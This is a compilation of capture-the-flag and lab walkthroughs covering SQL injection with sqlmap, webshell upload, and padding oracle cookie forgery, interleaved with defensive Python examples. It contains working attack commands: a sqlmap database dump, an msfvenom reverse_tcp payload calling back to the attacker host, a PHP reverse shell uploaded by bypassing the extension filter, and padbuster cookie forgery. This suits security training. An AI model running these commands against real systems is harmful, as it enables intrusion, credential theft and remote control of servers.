Hack the Pentester Lab: from SQL injection to Shell VM


Hello friends!! Today we are going to solve another CTF challenge, “From SQL injection to Shell I”. This VM is developed by Pentester Lab. You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell,80/
Install the ISO image in VMware and start it. The task in this lab is to gain access to the administration console and upload a PHP webshell.
Level: Beginner

Penetrating Methodologies
·         Network Scanning (Nmap)
·         Checking for error-based SQL injection
·         Exploiting SQL Injection (SQLMAP)
·         Uploading Web shell
·         Spawning Shell (Netcat)

Walkthrough

The target's IP address is 192.168.1.103; let's use nmap to find the open ports.
nmap -A 192.168.1.103




Since the HTTP port is open, we opened the target IP in a web browser and were greeted by the My Awesome Photoblog page. It contains the links home, test, ruxcon, 2010, all pictures and admin. Click on test.




The URL http://192.168.1.103/cat.php?id=1 runs a query for ID 1. Let's find out whether it is vulnerable to SQL injection by appending a single quote to the URL:
http://192.168.1.103/cat.php?id=1'
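To show why that stray quote is a meaningful test, here is an added Python example (not the lab's own code) that models the cat.php lookup with an in-memory SQLite table: a vulnerable version that concatenates the id parameter into the query text, next to a hardened version that validates the value and binds it as a parameter. The table contents and function names are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the photoblog's categories/pictures tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE pictures (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT);
        INSERT INTO categories VALUES (1, 'test'), (2, 'ruxcon'), (3, '2010');
        INSERT INTO pictures VALUES (1, 1, 'Test picture'), (2, 2, 'Ruxcon badge'),
                                    (3, 3, 'Summer 2010'), (4, 1, 'Second test');
    """)
    return db


def pictures_vulnerable(db, id_param):
    """Mirrors the classic PHP pattern: the raw id parameter is pasted into the SQL
    text, so a quote in the input becomes part of the query's syntax."""
    sql = "SELECT title FROM pictures WHERE cat=" + id_param
    return [row[0] for row in db.execute(sql)]


def pictures_safe(db, id_param):
    """Hardened form: reject anything that is not an integer, then bind the value as
    a parameter so the SQL text is fixed and the input can only ever be data."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    rows = db.execute("SELECT title FROM pictures WHERE cat=?", (int(id_param),))
    return [row[0] for row in rows]


def probe(lookup, db, id_param):
    """The check the walkthrough performs by hand: does appending a quote change the
    outcome? Returns 'rows:N', 'sql error' or 'rejected' for easy comparison."""
    try:
        return "rows:%d" % len(lookup(db, id_param))
    except sqlite3.OperationalError:
        return "sql error"      # the database parser choked on the injected quote
    except ValueError:
        return "rejected"       # input validation stopped it before any SQL ran
```

With the vulnerable lookup, `1` returns rows and `1'` produces a database error, which is exactly the difference the manual check looks for; with the hardened lookup the quoted input never reaches the database at all.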




sqlmap -u 192.168.1.103/cat.php?id=1 --dbs --batch
If you remember, the title of the web page was “An Awesome Photoblog”, so the database we want should be photoblog.




Now let's dump all the data in the photoblog database with the following command:
sqlmap -u 192.168.1.103/cat.php?id=1 -D photoblog --dump-all --batch




The first task was to gain access to the administration console, for which we need the login and password of the admin account. From the sqlmap dump we got the login admin and the password P4ssw0rd.




Congrats!!! The first task is completed.

Now the last task is to upload a PHP webshell. In the administration console you will see a link, Add a new picture, for uploading an image to the web server. Click on Add a new picture to upload an image.




Go to /usr/share/webshells/php/php-reverse-shell.php.
Open it in a text editor, set the listening IP and port for the reverse connection from the victim machine, and save the file with a .php extension. Then start a netcat listener on that port.
nc -lvp 1234




Then I uploaded the malicious PHP script.




It returns the error NO PHP!!, which means there is a filter that blocks the PHP/php extension.




Then I renamed the malicious script to shell.pHP and tried to upload it again.




Now you can see that a new row named shell has been added, which contains our backdoor shell.pHP. To execute the backdoor, click on shell and you will get a reverse connection at the netcat listener.
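The rename works because the upload check compares the literal suffix and misses other spellings of the same extension. The following is an added Python example, not the photoblog's code, contrasting a case-sensitive blocklist that mirrors the observed behaviour with an allowlist check that folds case, inspects every suffix component rather than only the last, and never reuses the client-supplied name on disk. The function names and the set of allowed image types are assumptions for the demo.

```python
import os
import secrets

ALLOWED_TYPES = {"jpg", "jpeg", "png", "gif"}   # what a photoblog actually needs


def allowed_blocklist(filename):
    """The pattern the 'NO PHP!!' error suggests: a fixed, case-sensitive blocklist.
    It only matches the exact spellings it was written with."""
    return not filename.endswith((".php", ".PHP"))


def allowed_allowlist(filename):
    """Hardened form: normalise the name, then require that every suffix component is
    a known image type. Unknown or mixed-case script extensions simply never match."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any client path
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return False                     # no extension, or a bare dotfile
    return all(part in ALLOWED_TYPES for part in parts[1:])


def stored_name(filename):
    """Pick the on-disk name server-side: a random basename plus the validated type,
    so the client's chosen name never reaches the filesystem."""
    if not allowed_allowlist(filename):
        raise ValueError("file type not allowed")
    ext = filename.lower().rsplit(".", 1)[1]
    return secrets.token_hex(8) + "." + ext
```

The allowlist is the important change: a blocklist has to anticipate every spelling an uploader might use, while an allowlist only has to know the handful of types the feature supports. Storing the file under a server-generated name, and ideally outside the web root, removes the remaining dependency on the user-supplied string.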




Wonderful!!! We have completed the last challenge too, and here we have spawned a shell on the victim web server.


Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)


This article is about using sqlmap to exploit SQL injection on a victim PC and gain shell access. Here I performed the SQL injection attack to obtain three different types of shell (meterpreter, command shell and VNC).

Requirements:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp Suite, sqlmap tool

First you need to install the DVWA lab on your XAMPP or WAMP server; read the full article from here.
Now open DVWA on your PC and log in with the following credentials:

Username – admin
Password – password

Click on DVWA Security and set the website security level to low.

From the list of vulnerabilities select SQL Injection for your attack. Type user ID 1 in the text box, but don't click the submit button before setting your browser proxy; the browser must be proxied through Burp Suite for it to capture the request.


Turn on Burp Suite, click on Proxy in the menu bar and make sure Intercept is on. Go back and click the submit button in DVWA. Burp Suite will show the cookie and referer headers in the captured request; these will be used later in the sqlmap commands.


Let's enumerate all the database names by passing the captured cookie to sqlmap:
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" --dbs




It has dumped all the database names. Now I am going to choose dvwa to access its back-end database management system.


Now type the following command to get a shell on the web server and follow the screenshots.
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn


Type 1 for the Metasploit Framework to establish a reverse connection, then 4 for the PHP payload (the language the server supports), and then 1 for the common-location search for a writable directory, where the payload will be uploaded as a backdoor on the victim PC.


Here type 1 for the reverse TCP connection, the default option. Now I will choose each of the three payloads in turn and try to compromise the web server each time. First type 1 for meterpreter.


It will load the Metasploit Framework and open meterpreter session 1.



Repeat the whole process up to the reverse TCP connection; when it asks you to choose the payload, type 2 for shell.


Again it loads the Metasploit Framework and opens command shell session 1.


Repeat the whole process up to the reverse TCP connection; when it asks you to choose the payload, this time type 3 for VNC.


Again it loads the Metasploit Framework and launches the VNC viewer.


Here you can see from the screenshot that I accessed the victim PC through TightVNC, and now every action of the victim can be observed. Hence we have compromised the victim PC three times with different types of shell.



Web Penetration Testing Lab setup using XVWA

XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security. It’s not advisable to host this application online as it is designed to be “Xtremely Vulnerable”. We recommend hosting this application in local/controlled environment and sharpening your application security ninja skills with any tools of your own choice. It’s totally legal to break or hack into this. The idea is to evangelize web application security to the community in possibly the easiest and fundamental way. Learn and acquire these skills for good purpose.
XVWA is designed to cover the following security issues.
·         SQL Injection – Error Based
·         SQL Injection – Blind
·         OS Command Injection
·         XPATH Injection
·         Formula Injection
·         PHP Object Injection
·         Unrestricted File Upload
·         Reflected Cross Site Scripting
·         Stored Cross Site Scripting
·         DOM Based Cross Site Scripting
·         Server Side Request Forgery (Cross Site Port Attacks)
·         File Inclusion
·         Session Issues
·         Insecure Direct Object Reference
·         Missing Functional Level Access Control
·         Cross Site Request Forgery (CSRF)
·         Cryptography
·         Unvalidated Redirect & Forwards
·         Server Side Template Injection

Configuring the XVWA lab on Windows is the same as for bWAPP. I am using XAMPP, so let's configure this lab under the XAMPP server. First download XVWA from here.


Now extract the XVWA lab setup into C:\xampp\htdocs\ as shown below and rename the folder to xvwa.

Open the xvwa folder to access its config file, then open the PHP file config to configure XVWA so that it runs on the localhost server.

You need to make several changes in the config file, shown in the screenshot below.

Remove “/var/www/html” from XVWA_WEBROOT; remove “xvwa” under dbname; replace “localhost” with “127.0.0.1”; then save the PHP file under the same name in the same location. See the screenshot of config after these changes for reference.



Next open the PHP configuration settings file; look at the image given below.

Make several changes again by setting all three settings to On.

Now it's time to run XVWA in the browser: type the URL 127.0.0.1:81/xvwa and you'll get the XVWA web page, which lists many attacks.


Meterpreter Shell Uploading in DVWA with SQL Injection

This article is very similar to the previous one; today I will use sqlmap to upload a backdoor file to a DVWA instance suffering from a SQL injection vulnerability.

Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, sqlmap tool

First you need to install the DVWA lab on your XAMPP or WAMP server; read the full article from here.
Now open DVWA on your PC and log in with the following credentials:

Username – admin
Password – password

Click on DVWA Security and set the website security level to low.

From the list of vulnerabilities select SQL Injection for your attack. Type user ID 1 in the text box, but don't click the submit button before setting your browser proxy; the browser must be proxied through Burp Suite for it to capture the request.


Turn on Burp Suite, click on Proxy in the menu bar and make sure Intercept is on. Go back and click the submit button in DVWA. The Intercept button displays the HTTP and WebSockets messages that pass between your browser and the web server. Burp Suite will show the cookie and referer headers in the captured request; these will be used later in the sqlmap commands.


Next, sqlmap will analyse the URL, connect to the target and then use SQL queries with the given cookie to fetch all the database names.

sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0" --dbs


If you look at the image below, it has dumped all the database names. Choose dvwa to upload the PHP backdoor.


Now type the following command to run sqlmap and get an os-shell on the web server (dvwa):
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D dvwa --os-shell


It will try to generate a backdoor. I want to create a PHP backdoor on the target PC, so type 4 for the PHP payload and then 4 for a brute-force search for a writable directory to upload to.


It is trying to upload the file to “/xampp/htdocs/” using different SQL injection techniques. As soon as the file is uploaded it reports INFO the file stager has been successfully uploaded on “/xampp/htdocs/” and you get an os-shell on the victim PC. It also shows the path where you can manually upload your backdoor; look at the highlighted URL:

http://192.168.0.102/tmpunias.php


Open the URL http://192.168.0.102/tmpunais.php in the browser. In the screenshot you can read the page heading sqlmap file uploader, which lets you browse for your backdoor and will upload it to the “/xampp/htdocs/” directory of the web server (dvwa).
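From the defender's side, both this walkthrough and the os-pwn one above leave recognisable traces in the web server's access log: sqlmap's default User-Agent names itself (unless --random-agent is used), and the stager it uploads is named tmpu plus four random lowercase letters (tmpunias.php above), with the backdoor written through that stager using a tmpb prefix in sqlmap's naming convention. The Python below is an added example, not from the page: it parses constructed Apache combined-format log lines and flags both signals per source IP. The log lines, IP addresses and timestamps are made up for the demo.

```python
import re
from collections import Counter

# Constructed Apache combined-format lines (not from the page) replaying the pattern of
# the walkthrough: a manual quote check, sqlmap probing, then the stager and backdoor.
SAMPLE_LOG = """\
192.168.0.50 - - [10/Mar/2018:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Mar/2018:10:01:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 612 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Mar/2018:10:01:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 612 "-" "sqlmap/1.2 (http://sqlmap.org)"
192.168.0.50 - - [10/Mar/2018:10:02:30 +0000] "GET /tmpunias.php HTTP/1.1" 200 302 "-" "sqlmap/1.2 (http://sqlmap.org)"
192.168.0.50 - - [10/Mar/2018:10:02:31 +0000] "POST /tmpunias.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Mar/2018:10:02:35 +0000] "GET /tmpbxyzw.php HTTP/1.1" 200 20 "-" "sqlmap/1.2 (http://sqlmap.org)"
192.168.0.77 - - [10/Mar/2018:10:03:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# sqlmap names its upload stager tmpu<4 lowercase letters>.<ext> (tmpunias.php on the
# page) and the backdoor it drops through the stager tmpb<4 letters>.<ext>.
STAGER_RE = re.compile(r"^/(?:[^?]*/)?tmp[ub][a-z]{4}\.(?:php|asp|aspx|jsp)(?:\?.*)?$")


def parse(line):
    """Return the log fields as a dict, or None for a line that is not in the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text):
    """Return (ip, signal, path) tuples for every request that looks like sqlmap activity."""
    findings = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["ua"].lower().startswith("sqlmap"):
            findings.append((rec["ip"], "sqlmap user-agent", rec["path"]))
        if STAGER_RE.match(rec["path"]):
            findings.append((rec["ip"], "sqlmap stager/backdoor file", rec["path"]))
    return findings


def suspicious_ips(findings, threshold=2):
    """Source IPs with at least `threshold` hits, most active first."""
    counts = Counter(ip for ip, _, _ in findings)
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]
```

The file-name signal is the more durable of the two: the User-Agent is trivially changed, but any request for a freshly created tmpu*/tmpb* script under the document root is worth an alert, and the same rule can be fed by file-integrity monitoring of the web root rather than by the access log.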


Let's prepare the malicious file to upload, using msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

copy the code from 

Now load the Metasploit Framework by typing msfconsole and start multi/handler.


Click on browse to select your shell.php file and then click on upload.


GREAT!!! It shows Admin File is uploaded, which means the backdoor shell.php has been uploaded.


To execute the backdoor on the target PC, open the URL 192.168.0.102/shell.php in the browser and you will receive a reverse connection at multi/handler.

msf > use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter > sysinfo
Divine!!! A meterpreter session is opened.


Hack Padding Oracle Lab (CTF Challenge)

The main purpose of solving this lab was to share the padding oracle attack technique with our visitors.

The padding oracle attack enables an attacker to decrypt encrypted data without knowledge of the encryption key or the cipher used, by sending skilfully manipulated ciphertexts to the padding oracle and observing the results it returns. This causes a loss of confidentiality of the encrypted data; for example, when session data is stored on the client side, the attacker can gain information about the internal state and structure of the application. A padding oracle attack also enables an attacker to encrypt arbitrary plaintexts without knowledge of the key or cipher. If the application assumes that the integrity and authenticity of the decrypted data are given, an attacker may be able to manipulate the internal session state and possibly gain higher privileges.
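As an added example, not from the page or the lab, the following Python models both halves of that paragraph against a toy 8-byte block cipher in CBC mode (8 is the block size later passed to padbuster). The cipher, the keys and the cookie plaintext user=raj are constructed for the demo; the recovery logic is the standard CBC padding-oracle procedure and does not depend on which block cipher sits underneath. The hardened service authenticates the token with an HMAC before decrypting, so every manipulated token is rejected identically and the oracle disappears.

```python
import hashlib
import hmac

BLOCK = 8                      # toy 8-byte block, the size given to padbuster on the page
KEY = b"demo-cbc-key"          # constructed demo keys, not from the page
MAC_KEY = b"demo-mac-key"      # used only by the hardened service
IV = bytes(range(BLOCK))

def _schedule(key):
    """Toy key schedule: an XOR mask plus a key-dependent permutation of byte positions."""
    digest = hashlib.sha256(key).digest()
    order, seed = list(range(BLOCK)), int.from_bytes(digest[8:16], "big")
    for i in range(BLOCK - 1, 0, -1):                  # Fisher-Yates shuffle driven by seed
        j, seed = seed % (i + 1), seed // (i + 1)
        order[i], order[j] = order[j], order[i]
    return digest[:BLOCK], order

def enc_block(key, block):
    """Toy block cipher (NOT secure; it only stands in for AES/DES so the demo runs offline)."""
    mask, order = _schedule(key)
    mixed = bytes(b ^ m for b, m in zip(block, mask))
    return bytes(mixed[order[i]] for i in range(BLOCK))

def dec_block(key, block):
    mask, order = _schedule(key)
    mixed = bytearray(BLOCK)
    for i in range(BLOCK):
        mixed[order[i]] = block[i]
    return bytes(b ^ m for b, m in zip(mixed, mask))

def pad(data):                 # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = enc_block(key, bytes(a ^ b for a, b in zip(padded[i:i + BLOCK], prev)))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += bytes(a ^ b for a, b in zip(dec_block(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return out

def leaky_check(token):
    """Vulnerable service: token = iv || ct, and a padding failure is distinguishable."""
    try:
        unpad(cbc_decrypt(KEY, token[:BLOCK], token[BLOCK:]))
        return True
    except ValueError:
        return False

def hardened_check(token):
    """Hardened service: token = iv || ct || HMAC(iv || ct). A forged token is rejected the
    same way every time, before any decryption, so there is no padding signal to observe."""
    body, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(hmac.new(MAC_KEY, body, hashlib.sha256).digest(), tag):
        return False
    unpad(cbc_decrypt(KEY, body[:BLOCK], body[BLOCK:]))   # only genuine tokens get here
    return True

def recover_block(check, prev, target):
    """Recover one plaintext block from nothing but the padding-ok / not-ok answer."""
    inter, forged = bytearray(BLOCK), bytearray(BLOCK)    # inter = dec_block(target)
    for k in range(BLOCK - 1, -1, -1):
        p = BLOCK - k                                     # pad value we try to produce
        for j in range(k + 1, BLOCK):
            forged[j] = inter[j] ^ p
        for guess in range(256):
            forged[k] = guess
            if not check(bytes(forged) + target):
                continue
            if k == BLOCK - 1:            # last byte: rule out a fluke such as 0x02 0x02
                forged[k - 1] ^= 0xFF     # the byte before it must not matter for 0x01
                if not check(bytes(forged) + target):
                    forged[k - 1] ^= 0xFF
                    continue
            inter[k] = guess ^ p
            break
        else:
            raise RuntimeError("no padding signal: the service is not an oracle")
    return bytes(i ^ c for i, c in zip(inter, prev))

def recover_all(check, token):
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    return unpad(b"".join(recover_block(check, blocks[i - 1], blocks[i])
                          for i in range(1, len(blocks))))

def demo(secret=b"user=raj"):
    """Returns (plaintext recovered from the leaky service, outcome against the hardened one)."""
    ct = cbc_encrypt(KEY, IV, pad(secret))
    leaked = recover_all(leaky_check, IV + ct)
    tag = hmac.new(MAC_KEY, IV + ct, hashlib.sha256).digest()
    try:
        recover_all(hardened_check, IV + ct + tag)
        return leaked, "broken"
    except RuntimeError:
        return leaked, "attack failed"
```

The recovery never touches the key: it only needs a service that answers "padding ok?" differently from "padding bad", which is what padbuster automates against the lab below. The fix is the same for any cipher: authenticate the ciphertext (encrypt-then-MAC, or an AEAD mode) and reject bad tokens before decrypting, with one uniform error for every failure.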


First you need to download the Padding Oracle VM from here. Now install the ISO image in VMware and start it.

Start Kali Linux and open the target IP 192.168.1.29 in the browser. At this point you need to create a user account, so click on the register option.


Now register a username with a password and then log in to exploit this vulnerability. I registered as raj:123.


Once you have created a user account, go to the login panel and at the same time use Burp Suite to capture the cookies.


Turn on Burp Suite and don't forget to set your browser's manual proxy. Now open the Proxy tab and turn Intercept on to capture the request to the target. When this is done you will see the captured data in the Intercept window. Here you can see that I am trying to log in with the credentials raj:123.


Now right-click in the window and a list of options will appear; click on Send to Repeater. In the screenshot you will see two panels, left and right, for the request and the response respectively.
In the left panel send username raj and password 123 as the request; click the Go button to forward it, and the response in the right panel will contain a newly generated auth cookie.

Copy the highlighted cookie; it will be used in the command below.


Next open a terminal and run the following command, which contains the target URL plus the cookie copied above:

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0

PadBuster is an automated script for performing padding oracle attacks, developed by Brian Holyfield of Gotham Digital Science; python-paddingoracle is a Python implementation heavily based on it. The command above decrypts the encrypted auth value into plaintext. When it asks for the recommended ID, type 2.


The last part of the screenshot shows the decrypted value in three forms: base64, hex and ASCII. The auth cookie is built from the username and its password, and from PadBuster we now know what the encrypted value for the user raj contains.


We are very near our goal: we just need to encrypt this auth cookie once again with admin as the user. Here our plaintext is user=admin; let's encrypt it using PadBuster.

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0 --plaintext user=admin
Further type 2 where it asked ID recommended.


The highlighted part is our encrypted value for admin. Copy it: “BAit--------AAAA”.


Go to Burp Suite once again and click on Params under the Intercept frame; it contains two fields, username and password. Now add a third field for the auth value: click the Add button on the right side of the frame, which adds another row to the params.


It has three columns: type, name and value. Enter the encrypted value obtained from PadBuster as type cookie, name auth, value BAit------AAAAAA. Then click Forward to send this request to the web server.

Again click on forward to send it.


When Burp Suite sends the request to the web server, you will be logged in to the admin account.
Congrats!!! We have met the goal of this lab.